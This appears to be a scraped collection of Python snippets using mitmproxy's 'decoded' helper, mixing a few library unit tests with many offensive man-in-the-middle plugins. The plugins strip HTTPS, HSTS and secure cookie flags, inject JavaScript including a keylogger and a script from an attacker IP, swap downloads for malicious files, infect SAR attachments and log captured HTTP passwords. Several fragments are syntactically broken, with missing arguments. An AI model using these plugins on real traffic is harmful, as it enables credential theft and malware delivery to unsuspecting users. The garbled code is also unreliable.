def response(flow): if flow.response.headers.get('Content-Type', '').startswith("text/html"): with decoded(flow.response): flow.response.content = flow.response.content.replace( "</body>", "<div style=\"font-size:400%;text-align:center;color:red;\">HACKED!!!</div></body>" )
def test_cannot_encode(self): r = tresp() assert r.encode("gzip") with decoded(r): r.content = None assert "content-encoding" not in r.headers assert r.content is None
def response(self, flow): with decoded(flow.response): if flow.response.content: c = flow.response.content.replace('</body>', '<style>body ' '{transform:rotate(180deg);-ms-transform:rotate(180deg);-webkit-transform:rotate(180deg);}' '</style></body>') if c > 0: self.send_output.emit('[{}] {} CSS injected...'.format(self.Name,flow.request.pretty_host))
def test_unknown_ce(self): r = tresp() r.headers["content-encoding"] = "zopfli" r.content = b"foo" with decoded(r): assert r.headers["content-encoding"] assert r.content == b"foo" assert r.headers["content-encoding"] assert r.content == b"foo"
def test_cannot_decode(self): r = tresp() assert r.encode("gzip") r.content = b"foo" with decoded(r): assert r.headers["content-encoding"] assert r.content == b"foo" assert r.headers["content-encoding"] assert r.content != b"foo" r.decode() assert r.content == b"foo"
def response(context, flow): from netlib.http import decoded with decoded(flow.response): # Remove HSTS headers flow.request.headers.pop('Strict-Transport-Security', None) flow.request.headers.pop('Public-Key-Pins', None) # Check if the file is a SAR file attachment if "content-disposition" in flow.response.headers: content_disposition = flow.response.headers.get( "content-disposition").lower() if content_disposition.startswith( "attachment") and content_disposition.endswith(".sar"): context.log("SAR file attachment found (%s bytes)" % flow.response.headers["content-length"]) fil = NamedTemporaryFile(delete=False) fil.write(flow.response.content) fil.close() context.log("SAR file temporally stored as '%s'" % infect_sar_file(, context.inject_files) context.log("SAR file infected !") with open(, "r") as new_fil: content = flow.response.content = content flow.response.headers["content-length"] = str(len(content)) context.log("Returning infected SAR file (new size %s bytes)" % flow.response.headers["content-length"]) unlink( context.log("Removed temporally file '%s'" % else: # Strip links in response body flow.response.content = flow.response.content.replace( 'https://', 'http://') # Strip links in 'Location' header if flow.response.headers.get('Location', '').startswith('https://'): location = flow.response.headers['Location'] from six.moves import urllib hostname = urllib.parse.urlparse(location).hostname if hostname: context.secure_hosts.add(hostname) flow.response.headers['Location'] = location.replace( 'https://', 'http://', 1) # Strip secure flag from 'Set-Cookie' headers cookies = flow.response.headers.get_all('Set-Cookie') cookies = [re.sub(r';\s*secure\s*', '', s) for s in cookies] flow.response.headers.set_all('Set-Cookie', cookies)
def test_modify(self): r = tresp() assert "content-encoding" not in r.headers assert r.encode("gzip") with decoded(r): r.content = b"foo" assert r.content != b"foo" r.decode() assert r.content == b"foo"
def response(self, flow): if str(flow.response.headers['Content-Type']).startswith('image'): if path.isfile(self.imagePath): with decoded(flow.response): try: img = StringIO(open(self.imagePath, 'rb').read()) flow.response.content = img.getvalue() self.send_output.emit( '[{}] URL:{} image replaced...'.format( self.Name, flow.request.url)) except: pass
def response(context, flow): headers = flow.response.headers is_text = None if hasattr(headers, "get_first"): is_text = headers.get_first('content-type', "").startswith("text") else: is_text = len(headers.get_all("content-type")) > 0 if enabled: if is_text: with http.decoded(flow.response): # automatically decode gzipped responses. # flow.response.content = flow.response.content.replace(context.old, flow.response.content = re.sub(r'(?i)(</body[^>]*>)', '<script src="http://%s:58080/target/target-script-min.js#anonymous"></script>\\1' % context.ip, flow.response.content)
def test_simple(self): r = tresp() assert r.content == b"message" assert "content-encoding" not in r.headers assert r.encode("gzip") assert r.headers["content-encoding"] assert r.content != b"message" with decoded(r): assert "content-encoding" not in r.headers assert r.content == b"message" assert r.headers["content-encoding"] assert r.content != b"message"
def response(context, flow): req = flow.request res = flow.response url = req.url with decoded(res): poor_man_global_var.append({ 'url': url, 'request': True, 'response': True, 'response_content': base64.b64encode(res.content) })
def response(context, flow): from netlib.http import decoded with decoded(flow.response): # Remove HSTS headers flow.request.headers.pop('Strict-Transport-Security', None) flow.request.headers.pop('Public-Key-Pins', None) # Check if the file is a SAR file attachment if "content-disposition" in flow.response.headers: content_disposition = flow.response.headers.get("content-disposition").lower() if content_disposition.startswith("attachment") and content_disposition.endswith(".sar"): context.log("SAR file attachment found (%s bytes)" % flow.response.headers["content-length"]) fil = NamedTemporaryFile(delete=False) fil.write(flow.response.content) fil.close() context.log("SAR file temporally stored as '%s'" % infect_sar_file(, context.inject_files) context.log("SAR file infected !") with open(, "r") as new_fil: content = flow.response.content = content flow.response.headers["content-length"] = str(len(content)) context.log("Returning infected SAR file (new size %s bytes)" % flow.response.headers["content-length"]) unlink( context.log("Removed temporally file '%s'" % else: # Strip links in response body flow.response.content = flow.response.content.replace('https://', 'http://') # Strip links in 'Location' header if flow.response.headers.get('Location', '').startswith('https://'): location = flow.response.headers['Location'] from six.moves import urllib hostname = urllib.parse.urlparse(location).hostname if hostname: context.secure_hosts.add(hostname) flow.response.headers['Location'] = location.replace('https://', 'http://', 1) # Strip secure flag from 'Set-Cookie' headers cookies = flow.response.headers.get_all('Set-Cookie') cookies = [re.sub(r';\s*secure\s*', '', s) for s in cookies] flow.response.headers.set_all('Set-Cookie', cookies)
def response(self, flow): with decoded(flow.response): # Remove content encoding (gzip, ...) html = BeautifulSoup(flow.response.content, 'lxml') """ # To Allow CORS if "Content-Security-Policy" in flow.response.headers: del flow.response.headers["Content-Security-Policy"] """ if html.body: url = '{}'.format(flow.request.pretty_host) metatag = html.new_tag('script') metatag.attrs['src'] = self.url metatag.attrs['type'] = 'text/javascript' html.body.append(metatag) flow.response.content = str(html) self.send_output.emit( "[{} js script Injected in [ {} ]".format(self.Name, url))
def response(context, flow): with decoded(flow.response): flow.request.headers.pop('Strict-Transport-Security', None) flow.request.headers.pop('Public-Key-Pins', None) # strip links in response body flow.response.content = flow.response.content.replace('https://', 'http://') # strip links in 'Location' header if flow.response.headers.get('Location', '').startswith('https://'): location = flow.response.headers['Location'] hostname = urllib.parse.urlparse(location).hostname if hostname: context.secure_hosts.add(hostname) flow.response.headers['Location'] = location.replace('https://', 'http://', 1) # strip secure flag from 'Set-Cookie' headers cookies = flow.response.headers.get_all('Set-Cookie') cookies = [re.sub(r';\s*secure\s*', '', s) for s in cookies] flow.response.headers.set_all('Set-Cookie', cookies)
def replace(self, pattern, repl, *args, **kwargs): """ Replaces a regular expression pattern with repl in both the headers and the body of the message. Encoded body will be decoded before replacement, and re-encoded afterwards. Returns the number of replacements made. """ with decoded(self): self.content, count = utils.safe_subn( pattern, repl, self.content, *args, **kwargs ) fields = [] for name, value in self.headers.fields: name, c = utils.safe_subn(pattern, repl, name, *args, **kwargs) count += c value, c = utils.safe_subn(pattern, repl, value, *args, **kwargs) count += c fields.append([name, value]) self.headers.fields = fields return count
def response(self, flow): if self.isfilePath: with decoded(flow.response): # Remove content encoding (gzip, ...) html = BeautifulSoup( flow.response.content.decode('utf-8', 'ignore'), 'lxml') """ # To Allow CORS if "Content-Security-Policy" in flow.response.headers: del flow.response.headers["Content-Security-Policy"] """ if html.body: temp_soup = BeautifulSoup(self.content, 'lxml') html.body.insert(len(html.body.contents), temp_soup) flow.response.content = str(html) return self.send_output.emit( "[{}] [Request]: {} | injected ".format( self.Name, flow.request.pretty_host)) else: return self.send_output.emit( "[{}] Error Path file not found ".format(self.Name))
def request(self, flow): self.send_output.emit("FOR: " + flow.request.url + " " + flow.request.method + " " + flow.request.path + " " + flow.request.http_version) with decoded(flow.request): user_passwd = self.get_password_POST(flow.request.content) if user_passwd != None: try: http_user = user_passwd[0].decode('utf8') http_pass = user_passwd[1].decode('utf8') # Set a limit on how long they can be prevent false+ if len(http_user) > 75 or len(http_pass) > 75: return self.send_output.emit( "\n[{}][HTTP REQUEST HEADERS]\n".format(self.Name)) for name, valur in flow.request.headers.iteritems(): self.send_output.emit('{}: {}'.format(name, valur)) self.send_output.emit('HTTP username: %s' % http_user) self.send_output.emit('HTTP password: %s\n' % http_pass) except UnicodeDecodeError: pass
def response(self, flow): try: # for another format file types content = flow.response.headers['Content-Type'] if content in self.payloads: if path.isfile(self.payloads[content]): with decoded(flow.response): self.send_output.emit( '[downloadspoof]:: URL: {}'.format( flow.request.url)) self.send_output.emit( "[downloadspoof]:: Replaced file of mimtype {} with malicious version" .format(content)) flow.response.content = open(self.payloads[content], 'rb').read() self.send_output.emit( '[downloadspoof]:: Patching complete, forwarding to user...' ) return self.send_output.emit( '[downloadspoof]:: {}, Error Path file not found\n'.format( self.payloads[content])) except Exception as e: pass
def response(self, flow): if self.isfilePath: with decoded(flow.response): flow.response.content = flow.response.content.replace("</body>", "<script>" + self.content + "</script></body>") self.send_output.emit('[{}] javascript keylogger injected..'.format(self.Name))